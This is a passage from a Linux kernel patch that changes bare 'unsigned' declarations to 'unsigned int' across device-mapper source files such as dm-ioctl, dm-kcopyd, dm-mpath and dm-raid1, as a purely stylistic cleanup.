+-	unsigned num_bvecs;
++	unsigned int offset;
++	unsigned int num_bvecs;
+ 	sector_t remaining = where->count;
+ 	struct request_queue *q = bdev_get_queue(where->bdev);
+ 	sector_t num_sectors;
+@@ -508,7 +508,7 @@ static int dp_init(struct dm_io_request *io_req, struct dpages *dp,
+ 	return 0;
+ }
+ 
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+ 	  struct dm_io_region *where, unsigned long *sync_error_bits)
+ {
+ 	int r;
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index fdb7846a97a40..41d55218b0764 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -31,7 +31,7 @@ struct dm_file {
+ 	 * poll will wait until the global event number is greater than
+ 	 * this value.
+ 	 */
+-	volatile unsigned global_event_nr;
++	volatile unsigned int global_event_nr;
+ };
+ 
+ /*-----------------------------------------------------------------
+@@ -413,7 +413,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 	struct hash_cell *hc;
+ 	struct dm_table *table;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 	int srcu_idx;
+ 
+ 	/*
+@@ -1021,7 +1021,7 @@ static int dev_rename(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 	int r;
+ 	char *new_data = (char *) param + param->data_start;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 
+ 	if (new_data < param->data ||
+ 	    invalid_str(new_data, (void *) param + param_size) || !*new_data ||
+@@ -1096,7 +1096,7 @@ out:
+ static int do_suspend(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct mapped_device *md;
+ 
+ 	md = find_device(param);
+@@ -1125,7 +1125,7 @@ out:
+ static int do_resume(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
+@@ -1243,7 +1243,7 @@ static void retrieve_status(struct dm_table *table,
+ 	char *outbuf, *outptr;
+ 	status_type_t type;
+ 	size_t remaining, len, used = 0;
+-	unsigned status_flags = 0;
++	unsigned int status_flags = 0;
+ 
+ 	outptr = outbuf = get_result_buffer(param, param_size, &len);
+ 
+@@ -1648,8 +1648,8 @@ static int table_status(struct file *filp, struct dm_ioctl *param, size_t param_
+  * Returns a number <= 1 if message was processed by device mapper.
+  * Returns 2 if message should be delivered to the target.
+  */
+-static int message_for_md(struct mapped_device *md, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int message_for_md(struct mapped_device *md, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
+@@ -1859,7 +1859,7 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 	struct dm_ioctl *dmi;
+ 	int secure_data;
+ 	const size_t minimum_data_size = offsetof(struct dm_ioctl, data);
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 
+ 	if (copy_from_user(param_kernel, user, minimum_data_size))
+ 		return -EFAULT;
+diff --git a/drivers/md/dm-kcopyd.c b/drivers/md/dm-kcopyd.c
+index 4d3bbbea2e9a8..0ef78e56aa88c 100644
+--- a/drivers/md/dm-kcopyd.c
++++ b/drivers/md/dm-kcopyd.c
+@@ -34,14 +34,14 @@
+ #define DEFAULT_SUB_JOB_SIZE_KB 512
+ #define MAX_SUB_JOB_SIZE_KB     1024
+ 
+-static unsigned kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
++static unsigned int kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
+ 
+ module_param(kcopyd_subjob_size_kb, uint, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(kcopyd_subjob_size_kb, "Sub-job size for dm-kcopyd clients");
+ 
+-static unsigned dm_get_kcopyd_subjob_size(void)
++static unsigned int dm_get_kcopyd_subjob_size(void)
+ {
+-	unsigned sub_job_size_kb;
++	unsigned int sub_job_size_kb;
+ 
+ 	sub_job_size_kb = __dm_get_module_param(&kcopyd_subjob_size_kb,
+ 						DEFAULT_SUB_JOB_SIZE_KB,
+@@ -56,9 +56,9 @@ static unsigned dm_get_kcopyd_subjob_size(void)
+  *---------------------------------------------------------------*/
+ struct dm_kcopyd_client {
+ 	struct page_list *pages;
+-	unsigned nr_reserved_pages;
+-	unsigned nr_free_pages;
+-	unsigned sub_job_size;
++	unsigned int nr_reserved_pages;
++	unsigned int nr_free_pages;
++	unsigned int sub_job_size;
+ 
+ 	struct dm_io_client *io_client;
+ 
+@@ -119,7 +119,7 @@ static DEFINE_SPINLOCK(throttle_spinlock);
+ 
+ static void io_job_start(struct dm_kcopyd_throttle *t)
+ {
+-	unsigned throttle, now, difference;
++	unsigned int throttle, now, difference;
+ 	int slept = 0, skew;
+ 
+ 	if (unlikely(!t))
+@@ -182,7 +182,7 @@ static void io_job_finish(struct dm_kcopyd_throttle *t)
+ 		goto skip_limit;
+ 
+ 	if (!t->num_io_jobs) {
+-		unsigned now, difference;
++		unsigned int now, difference;
+ 
+ 		now = jiffies;
+ 		difference = now - t->last_jiffies;
+@@ -303,9 +303,9 @@ static void drop_pages(struct page_list *pl)
+ /*
+  * Allocate and reserve nr_pages for the use of a specific client.
+  */
+-static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned nr_pages)
++static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned int nr_pages)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct page_list *pl = NULL, *next;
+ 
+ 	for (i = 0; i < nr_pages; i++) {
+@@ -341,7 +341,7 @@ static void client_free_pages(struct dm_kcopyd_client *kc)
+ struct kcopyd_job {
+ 	struct dm_kcopyd_client *kc;
+ 	struct list_head list;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	/*
+ 	 * Error state of the job.
+@@ -582,7 +582,7 @@ static int run_io_job(struct kcopyd_job *job)
+ static int run_pages_job(struct kcopyd_job *job)
+ {
+ 	int r;
+-	unsigned nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
++	unsigned int nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
+ 
+ 	r = kcopyd_get_pages(job->kc, nr_pages, &job->pages);
+ 	if (!r) {
+@@ -849,8 +849,8 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+ EXPORT_SYMBOL(dm_kcopyd_copy);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context)
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context)
+ {
+ 	dm_kcopyd_copy(kc, NULL, num_dests, dests, flags, fn, context);
+ }
+@@ -906,7 +906,7 @@ int kcopyd_cancel(struct kcopyd_job *job, int block)
+ struct dm_kcopyd_client *dm_kcopyd_client_create(struct dm_kcopyd_throttle *throttle)
+ {
+ 	int r;
+-	unsigned reserve_pages;
++	unsigned int reserve_pages;
+ 	struct dm_kcopyd_client *kc;
+ 
+ 	kc = kzalloc(sizeof(*kc), GFP_KERNEL);
+diff --git a/drivers/md/dm-linear.c b/drivers/md/dm-linear.c
+index 3212ef6aa81bb..26b1af6461771 100644
+--- a/drivers/md/dm-linear.c
++++ b/drivers/md/dm-linear.c
+@@ -95,7 +95,7 @@ static int linear_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void linear_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct linear_c *lc = (struct linear_c *) ti->private;
+ 	size_t sz = 0;
+diff --git a/drivers/md/dm-log-userspace-base.c b/drivers/md/dm-log-userspace-base.c
+index 9ab93ebea8895..9fc69382692bd 100644
+--- a/drivers/md/dm-log-userspace-base.c
++++ b/drivers/md/dm-log-userspace-base.c
+@@ -123,7 +123,7 @@ retry:
+ }
+ 
+ static int build_constructor_string(struct dm_target *ti,
+-				    unsigned argc, char **argv,
++				    unsigned int argc, char **argv,
+ 				    char **ctr_str)
+ {
+ 	int i, str_size;
+@@ -188,7 +188,7 @@ static void do_flush(struct work_struct *work)
+  * to the userspace ctr function.
+  */
+ static int userspace_ctr(struct dm_dirty_log *log, struct dm_target *ti,
+-			 unsigned argc, char **argv)
++			 unsigned int argc, char **argv)
+ {
+ 	int r = 0;
+ 	int str_size;
+@@ -792,7 +792,7 @@ static region_t userspace_get_sync_count(struct dm_dirty_log *log)
+  * Returns: amount of space consumed
+  */
+ static int userspace_status(struct dm_dirty_log *log, status_type_t status_type,
+-			    char *result, unsigned maxlen)
++			    char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+ 	char *table_args;
+diff --git a/drivers/md/dm-log-userspace-transfer.c b/drivers/md/dm-log-userspace-transfer.c
+index fdf8ec304f8d2..072559b709edd 100644
+--- a/drivers/md/dm-log-userspace-transfer.c
++++ b/drivers/md/dm-log-userspace-transfer.c
+@@ -142,7 +142,7 @@ static void cn_ulog_callback(struct cn_msg *msg, struct netlink_skb_parms *nsp)
+ 		fill_pkg(msg, NULL);
+ 	else if (msg->len < sizeof(*tfr))
+ 		DMERR("Incomplete message received (expected %u, got %u): [%u]",
+-		      (unsigned)sizeof(*tfr), msg->len, msg->seq);
++		      (unsigned int)sizeof(*tfr), msg->len, msg->seq);
+ 	else
+ 		fill_pkg(NULL, tfr);
+ 	spin_unlock(&receiving_list_lock);
+diff --git a/drivers/md/dm-log-writes.c b/drivers/md/dm-log-writes.c
+index 178e13a5b059f..efdfb2e1868a4 100644
+--- a/drivers/md/dm-log-writes.c
++++ b/drivers/md/dm-log-writes.c
+@@ -792,10 +792,10 @@ static int normal_end_io(struct dm_target *ti, struct bio *bio,
+  * INFO format: <logged entries> <highest allocated sector>
+  */
+ static void log_writes_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result,
+-			      unsigned maxlen)
++			      unsigned int status_flags, char *result,
++			      unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct log_writes_c *lc = ti->private;
+ 
+ 	switch (type) {
+@@ -844,8 +844,8 @@ static int log_writes_iterate_devices(struct dm_target *ti,
+  * Messages supported:
+  *   mark <mark data> - specify the marked data.
+  */
+-static int log_writes_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int log_writes_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct log_writes_c *lc = ti->private;
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index cf10fa6677972..159f2c05dfd3c 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -223,7 +223,7 @@ struct log_c {
+ 	unsigned int region_count;
+ 	region_t sync_count;
+ 
+-	unsigned bitset_uint32_count;
++	unsigned int bitset_uint32_count;
+ 	uint32_t *clean_bits;
+ 	uint32_t *sync_bits;
+ 	uint32_t *recovering_bits;	/* FIXME: this seems excessive */
+@@ -255,20 +255,20 @@ struct log_c {
+  * The touched member needs to be updated every time we access
+  * one of the bitsets.
+  */
+-static inline int log_test_bit(uint32_t *bs, unsigned bit)
++static inline int log_test_bit(uint32_t *bs, unsigned int bit)
+ {
+ 	return test_bit_le(bit, bs) ? 1 : 0;
+ }
+ 
+ static inline void log_set_bit(struct log_c *l,
+-			       uint32_t *bs, unsigned bit)
++			       uint32_t *bs, unsigned int bit)
+ {
+ 	__set_bit_le(bit, bs);
+ 	l->touched_cleaned = 1;
+ }
+ 
+ static inline void log_clear_bit(struct log_c *l,
+-				 uint32_t *bs, unsigned bit)
++				 uint32_t *bs, unsigned int bit)
+ {
+ 	__clear_bit_le(bit, bs);
+ 	l->touched_dirtied = 1;
+@@ -582,7 +582,7 @@ static void fail_log_device(struct log_c *lc)
+ static int disk_resume(struct dm_dirty_log *log)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct log_c *lc = (struct log_c *) log->context;
+ 	size_t size = lc->bitset_uint32_count * sizeof(uint32_t);
+ 
+diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c
+index 0e325469a252a..91c25ad8eed84 100644
+--- a/drivers/md/dm-mpath.c
++++ b/drivers/md/dm-mpath.c
+@@ -29,7 +29,7 @@
+ 
+ #define DM_MSG_PREFIX "multipath"
+ #define DM_PG_INIT_DELAY_MSECS 2000
+-#define DM_PG_INIT_DELAY_DEFAULT ((unsigned) -1)
++#define DM_PG_INIT_DELAY_DEFAULT ((unsigned int) -1)
+ #define QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT 0
+ 
+ static unsigned long queue_if_no_path_timeout_secs = QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT;
+@@ -39,7 +39,7 @@ struct pgpath {
+ 	struct list_head list;
+ 
+ 	struct priority_group *pg;	/* Owning PG */
+-	unsigned fail_count;		/* Cumulative failure count */
++	unsigned int fail_count;		/* Cumulative failure count */
+ 
+ 	struct dm_path path;
+ 	struct delayed_work activate_path;
+@@ -59,8 +59,8 @@ struct priority_group {
+ 	struct multipath *m;		/* Owning multipath instance */
+ 	struct path_selector ps;
+ 
+-	unsigned pg_num;		/* Reference number */
+-	unsigned nr_pgpaths;		/* Number of paths in PG */
++	unsigned int pg_num;		/* Reference number */
++	unsigned int nr_pgpaths;		/* Number of paths in PG */
+ 	struct list_head pgpaths;
+ 
+ 	bool bypassed:1;		/* Temporarily bypass this PG? */
+@@ -78,14 +78,14 @@ struct multipath {
+ 	struct priority_group *next_pg;	/* Switch to this PG if set */
+ 
+ 	atomic_t nr_valid_paths;	/* Total number of usable paths */
+-	unsigned nr_priority_groups;
++	unsigned int nr_priority_groups;
+ 	struct list_head priority_groups;
+ 
+ 	const char *hw_handler_name;
+ 	char *hw_handler_params;
+ 	wait_queue_head_t pg_init_wait;	/* Wait for pg_init completion */
+-	unsigned pg_init_retries;	/* Number of times to retry pg_init */
+-	unsigned pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
++	unsigned int pg_init_retries;	/* Number of times to retry pg_init */
++	unsigned int pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
+ 	atomic_t pg_init_in_progress;	/* Only one pg_init allowed at once */
+ 	atomic_t pg_init_count;		/* Number of times pg_init called */
+ 
+@@ -397,7 +397,7 @@ static struct pgpath *choose_pgpath(struct multipath *m, size_t nr_bytes)
+ 	unsigned long flags;
+ 	struct priority_group *pg;
+ 	struct pgpath *pgpath;
+-	unsigned bypassed = 1;
++	unsigned int bypassed = 1;
+ 
+ 	if (!atomic_read(&m->nr_valid_paths)) {
+ 		spin_lock_irqsave(&m->lock, flags);
+@@ -840,7 +840,7 @@ static int parse_path_selector(struct dm_arg_set *as, struct priority_group *pg,
+ {
+ 	int r;
+ 	struct path_selector_type *pst;
+-	unsigned ps_argc;
++	unsigned int ps_argc;
+ 
+ 	static const struct dm_arg _args[] = {
+ 		{0, 1024, "invalid number of path selector args"},
+@@ -983,7 +983,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 	};
+ 
+ 	int r;
+-	unsigned i, nr_selector_args, nr_args;
++	unsigned int i, nr_selector_args, nr_args;
+ 	struct priority_group *pg;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1049,7 +1049,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 
+ static int parse_hw_handler(struct dm_arg_set *as, struct multipath *m)
+ {
+-	unsigned hw_argc;
++	unsigned int hw_argc;
+ 	int ret;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1101,7 +1101,7 @@ fail:
+ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = m->ti;
+ 	const char *arg_name;
+ 
+@@ -1170,7 +1170,7 @@ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ 	return r;
+ }
+ 
+-static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int multipath_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	/* target arguments */
+ 	static const struct dm_arg _args[] = {
+@@ -1181,8 +1181,8 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	int r;
+ 	struct multipath *m;
+ 	struct dm_arg_set as;
+-	unsigned pg_count = 0;
+-	unsigned next_pg_num;
++	unsigned int pg_count = 0;
++	unsigned int next_pg_num;
+ 	unsigned long flags;
+ 
+ 	as.argc = argc;
+@@ -1224,7 +1224,7 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	/* parse the priority groups */
+ 	while (as.argc) {
+ 		struct priority_group *pg;
+-		unsigned nr_valid_paths = atomic_read(&m->nr_valid_paths);
++		unsigned int nr_valid_paths = atomic_read(&m->nr_valid_paths);
+ 
+ 		pg = parse_priority_group(&as, m);
+ 		if (IS_ERR(pg)) {
+@@ -1365,7 +1365,7 @@ static int reinstate_path(struct pgpath *pgpath)
+ 	int r = 0, run_queue = 0;
+ 	unsigned long flags;
+ 	struct multipath *m = pgpath->pg->m;
+-	unsigned nr_valid_paths;
++	unsigned int nr_valid_paths;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+ 
+@@ -1454,7 +1454,7 @@ static void bypass_pg(struct multipath *m, struct priority_group *pg,
+ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	unsigned long flags;
+ 	char dummy;
+ 
+@@ -1487,7 +1487,7 @@ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ static int bypass_pg_num(struct multipath *m, const char *pgstr, bool bypassed)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	char dummy;
+ 
+ 	if (!pgstr || (sscanf(pgstr, "%u%c", &pgnum, &dummy) != 1) || !pgnum ||
+@@ -1789,14 +1789,14 @@ static void multipath_resume(struct dm_target *ti)
+  *      num_paths num_selector_args [path_dev [selector_args]* ]+ ]+
+  */
+ static void multipath_status(struct dm_target *ti, status_type_t type,
+-			     unsigned status_flags, char *result, unsigned maxlen)
++			     unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int sz = 0, pg_counter, pgpath_counter;
+ 	unsigned long flags;
+ 	struct multipath *m = ti->private;
+ 	struct priority_group *pg;
+ 	struct pgpath *p;
+-	unsigned pg_num;
++	unsigned int pg_num;
+ 	char state;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+@@ -1948,8 +1948,8 @@ static void multipath_status(struct dm_target *ti, status_type_t type,
+ 	spin_unlock_irqrestore(&m->lock, flags);
+ }
+ 
+-static int multipath_message(struct dm_target *ti, unsigned argc, char **argv,
+-			     char *result, unsigned maxlen)
++static int multipath_message(struct dm_target *ti, unsigned int argc, char **argv,
++			     char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_dev *dev;
+diff --git a/drivers/md/dm-mpath.h b/drivers/md/dm-mpath.h
+index e230f71962596..5343698fe5f1b 100644
+--- a/drivers/md/dm-mpath.h
++++ b/drivers/md/dm-mpath.h
+@@ -17,6 +17,6 @@ struct dm_path {
+ };
+ 
+ /* Callback for hwh_pg_init_fn to use when complete */
+-void dm_pg_init_complete(struct dm_path *path, unsigned err_flags);
++void dm_pg_init_complete(struct dm_path *path, unsigned int err_flags);
+ 
+ #endif
+diff --git a/drivers/md/dm-path-selector.h b/drivers/md/dm-path-selector.h
+index 83cac2b04b668..0f2b37af87662 100644
+--- a/drivers/md/dm-path-selector.h
++++ b/drivers/md/dm-path-selector.h
+@@ -52,7 +52,7 @@ struct path_selector_type {
+ 	/*
+ 	 * Constructs a path selector object, takes custom arguments
+ 	 */
+-	int (*create) (struct path_selector *ps, unsigned argc, char **argv);
++	int (*create) (struct path_selector *ps, unsigned int argc, char **argv);
+ 	void (*destroy) (struct path_selector *ps);
+ 
+ 	/*
+diff --git a/drivers/md/dm-ps-io-affinity.c b/drivers/md/dm-ps-io-affinity.c
+index f74501e65a8ed..76ce4ce872229 100644
+--- a/drivers/md/dm-ps-io-affinity.c
++++ b/drivers/md/dm-ps-io-affinity.c
+@@ -108,7 +108,7 @@ free_pi:
+ 	return ret;
+ }
+ 
+-static int ioa_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ioa_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -138,7 +138,7 @@ free_selector:
+ static void ioa_destroy(struct path_selector *ps)
+ {
+ 	struct selector *s = ps->context;
+-	unsigned cpu;
++	unsigned int cpu;
+ 
+ 	for_each_cpu(cpu, s->path_mask)
+ 		ioa_free_path(s, cpu);
+diff --git a/drivers/md/dm-ps-queue-length.c b/drivers/md/dm-ps-queue-length.c
+index cef70657bbbc2..6fbec9fc242d9 100644
+--- a/drivers/md/dm-ps-queue-length.c
++++ b/drivers/md/dm-ps-queue-length.c
+@@ -35,7 +35,7 @@ struct selector {
+ struct path_info {
+ 	struct list_head	list;
+ 	struct dm_path		*path;
+-	unsigned		repeat_count;
++	unsigned int		repeat_count;
+ 	atomic_t		qlen;	/* the number of in-flight I/Os */
+ };
+ 
+@@ -52,7 +52,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int ql_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ql_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -84,9 +84,9 @@ static void ql_destroy(struct path_selector *ps)
+ }
+ 
+ static int ql_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	/* When called with NULL path, return selector status/args. */
+@@ -116,7 +116,7 @@ static int ql_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = QL_MIN_IO;
++	unsigned int repeat_count = QL_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-round-robin.c b/drivers/md/dm-ps-round-robin.c
+index 27f44c5fa04e8..1d07392b5ed48 100644
+--- a/drivers/md/dm-ps-round-robin.c
++++ b/drivers/md/dm-ps-round-robin.c
+@@ -26,7 +26,7 @@
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
++	unsigned int repeat_count;
+ };
+ 
+ static void free_paths(struct list_head *paths)
+@@ -62,7 +62,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int rr_create(struct path_selector *ps, unsigned argc, char **argv)
++static int rr_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -119,7 +119,7 @@ static int rr_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = RR_MIN_IO;
++	unsigned int repeat_count = RR_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-service-time.c b/drivers/md/dm-ps-service-time.c
+index 3ec9c33265c52..84d26234dc053 100644
+--- a/drivers/md/dm-ps-service-time.c
++++ b/drivers/md/dm-ps-service-time.c
+@@ -30,8 +30,8 @@ struct selector {
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
+-	unsigned relative_throughput;
++	unsigned int repeat_count;
++	unsigned int relative_throughput;
+ 	atomic_t in_flight_size;	/* Total size of in-flight I/Os */
+ };
+ 
+@@ -48,7 +48,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int st_create(struct path_selector *ps, unsigned argc, char **argv)
++static int st_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -80,9 +80,9 @@ static void st_destroy(struct path_selector *ps)
+ }
+ 
+ static int st_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	if (!path)
+@@ -113,8 +113,8 @@ static int st_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = ST_MIN_IO;
+-	unsigned relative_throughput = 1;
++	unsigned int repeat_count = ST_MIN_IO;
++	unsigned int relative_throughput = 1;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index 54263679a7b14..b26c12856b1db 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -3712,7 +3712,7 @@ static void raid_status(struct dm_target *ti, status_type_t type,
+ }
+ 
+ static int raid_message(struct dm_target *ti, unsigned int argc, char **argv,
+-			char *result, unsigned maxlen)
++			char *result, unsigned int maxlen)
+ {
+ 	struct raid_set *rs = ti->private;
+ 	struct mddev *mddev = &rs->md;
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index 06a38dc320253..8bd7e87d3538e 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -82,7 +82,7 @@ struct mirror_set {
+ 
+ 	struct work_struct trigger_event;
+ 
+-	unsigned nr_mirrors;
++	unsigned int nr_mirrors;
+ 	struct mirror mirror[];
+ };
+ 
+@@ -327,7 +327,7 @@ static void recovery_complete(int read_err, unsigned long write_err,
+ 
+ static void recover(struct mirror_set *ms, struct dm_region *reg)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_io_region from, to[DM_KCOPYD_MAX_REGIONS], *dest;
+ 	struct mirror *m;
+ 	unsigned long flags = 0;
+@@ -593,7 +593,7 @@ static void do_reads(struct mirror_set *ms, struct bio_list *reads)
+ 
+ static void write_callback(unsigned long error, void *context)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct bio *bio = (struct bio *) context;
+ 	struct mirror_set *ms;
+ 	int should_wake = 0;
+@@ -963,10 +963,10 @@ static int get_mirror(struct mirror_set *ms, struct dm_target *ti,
+  * Create dirty log: log_type #log_params <log_params>
+  */
+ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+-					     unsigned argc, char **argv,
+-					     unsigned *args_used)
++					     unsigned int argc, char **argv,
++					     unsigned int *args_used)
+ {
+-	unsigned param_count;
++	unsigned int param_count;
+ 	struct dm_dirty_log *dl;
+ 	char dummy;
+ 
+@@ -997,10 +997,10 @@ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+ 	return dl;
+ }
+ 
+-static int parse_features(struct mirror_set *ms, unsigned argc, char **argv,
+-			  unsigned *args_used)
++static int parse_features(struct mirror_set *ms, unsigned int argc, char **argv,
++			  unsigned int *args_used)
+ {
+-	unsigned num_features;
++	unsigned int num_features;
+ 	struct dm_target *ti = ms->ti;
+ 	char dummy;
+ 	int i;
+@@ -1389,7 +1389,7 @@ static char device_status_char(struct mirror *m)
+ 
+ 
+ static void mirror_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	unsigned int m, sz = 0;
+ 	int num_feature_args = 0;
+@@ -1458,7 +1458,7 @@ static int mirror_iterate_devices(struct dm_target *ti,
+ {
+ 	struct mirror_set *ms = ti->private;
+ 	int ret = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; !ret && i < ms->nr_mirrors; i++)
+ 		ret = fn(ti, ms->mirror[i].dev,
+diff --git a/drivers/md/dm-region-hash.c b/drivers/md/dm-region-hash.c
+index 1f760451e6f48..adbdb4b671372 100644
+--- a/drivers/md/dm-region-hash.c
++++ b/drivers/md/dm-region-hash.c
+@@ -56,17 +56,17 @@
+  *---------------------------------------------------------------*/
+ struct dm_region_hash {
+ 	uint32_t region_size;
+-	unsigned region_shift;
++	unsigned int region_shift;
+ 
+ 	/* holds persistent region state */
+ 	struct dm_dirty_log *log;
+ 
+ 	/* hash table */
+ 	rwlock_t hash_lock;
+-	unsigned mask;
+-	unsigned nr_buckets;
+-	unsigned prime;
+-	unsigned shift;
++	unsigned int mask;
++	unsigned int nr_buckets;
++	unsigned int prime;
++	unsigned int shift;
+ 	struct list_head *buckets;
+ 
+ 	/*
+@@ -74,7 +74,7 @@ struct dm_region_hash {
+ 	 */
+ 	int flush_failure;
+ 
+-	unsigned max_recovery; /* Max # of regions to recover in parallel */
++	unsigned int max_recovery; /* Max # of regions to recover in parallel */
+ 
+ 	spinlock_t region_lock;
